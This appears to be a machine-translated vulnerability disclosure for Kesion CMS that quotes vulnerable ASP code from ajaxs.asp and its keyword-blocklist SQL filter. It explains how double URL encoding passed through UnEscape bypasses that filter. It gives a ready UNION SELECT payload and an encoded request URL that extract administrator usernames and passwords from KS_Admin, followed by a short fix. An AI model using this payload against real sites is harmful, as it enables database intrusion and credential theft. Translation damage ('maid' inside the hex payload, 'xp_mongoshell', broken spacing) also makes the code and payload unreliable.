Kesion cms Injection Vulnerability

Injection caused by chaotic function Filtering

Dim KS: Set KS = New PublicCls
Dim Action
Action = KS. S ("Action ")
Select Case Action
Case "Ctoe" CtoE
Case "GetTags" GetTags
Case "GetRelativeItem" GetRelativeItem // problem Function
... Skip...
Case "getonlinelist" getonlinelist
End Select
 
 
Sub GetRelativeItem () // vulnerability function starts
Dim Key: Key = UnEscape (KS. S ("Key") // vulnerability location, only the ks. s function is called, and no other filtering is performed.
Dim Rtitle: rtitle = lcase (KS. G ("rtitle "))
Dim RKey: Rkey = lcase (KS. G ("Rkey "))
Dim ChannelID: ChannelID = KS. ChkClng (KS. S ("Channelid "))
Dim ID: ID = KS. ChkClng (KS. G ("ID "))
Dim Param, RS, SQL, k, SqlStr
If Key <> "" Then
If (Rtitle = "true" Or RKey = "true") Then
If Rtitle = "true" Then
Param = Param & "title like '%" & key & "%'" // search-like injection vulnerability.
End if
If Rkey = "true" Then
If Param = "" Then
Param = Param & "keywords like '%" & key & "% '"
Else
Param = Param & "or keywords like '%" & key & "% '"
End If
End If
Else
Param = Param & "keywords like '%" & key & "% '"
End If
End If


If Param <> "" Then
Param = "where InfoID <>" & id & "and (" & param &")"
Else
Param = "where InfoID <>" & id
End if

If ChannelID <> 0 Then Param = Param & "and ChannelID =" & ChannelID

Param = Param & "and verific = 1"

SqlStr = "Select top 30 ChannelID, InfoID, Title From KS_ItemInfo" & Param & "order by id desc" // query www.2cto.com
Set RS = Server. CreateObject ("ADODB. RECORDSET ")
RS. Open SqlStr, conn, 1, 1
If Not RS. Eof Then
SQL = RS. GetRows (-1)
End If
RS. Close
 
First, filter and then call UnEscape decoding,
 
Public Function S (Str)
S = DelSql (Replace (Request (Str ),"'",""),"""",""))
 
 
Function DelSql (Str)
Dim SplitSqlStr, SplitSqlArr, I
SplitSqlStr = "dbcc | alter | drop | * | and | exec | or | insert | select | delete | update | count | master | truncate | declare | char | mid | chr | set | where | xp_mongoshell"
SplitSqlArr = Split (SplitSqlStr, "| ")
For I = LBound (SplitSqlArr) To Ubound (SplitSqlArr)
If Instr (LCase (Str), SplitSqlArr (I)> 0 Then
Die "<script> alert ('System warning! \ N \ n1. The data you submit contains malicious characters "& SplitSqlArr (I) &"; \ n2. Your data has been recorded; \ n3. Your IP Address: "& GetIP &"; \ n4, Operation Date: "& Now &"; \ n Powered By Kesion. com! '); Window. close (); </script>"
End if
Next
DelSql = Str
End Function
 
If you use the Unescape () function, the filter does not take effect. You can use unicode encoding to prevent characters from being filtered in the browser. For example, single quotes can be encoded. % 2527, After decoding, it is still "'". In this way, you can bypass filtering by using a second Encoding vulnerability similar to php. Www.2cto.com


Injection statement: % ') union select 1, 2, username +' | '+ password from KS_Admin
 
The conversion is as follows:
/Plus/ajaxs. asp? Action = GetRelativeItem & key = search % 2525% 2527% 2529% 2520% 2575% 256e % 2569% 256f % 256e % 2520% 2573% 2565% 256c % 2565% 2563% 2574% 2520% 2531% 252c % 2532% 252c % 2575% 2573% 2565% 2572% 256e % 2561% 256d % 2565% 252b % 2527% 257c % 2527% 252b % 2570% 2561% 2573% 2573% 256f % 2577% 2572% 2564% 2520% 2566% 2572% 256f % 256d % 2520% 254b % 2553% 255f % 2541% 256d % 2564% maid % 2500
Solution:

The location where the UnEscape () function is called is placed in the function body or not called.

Author ywledoc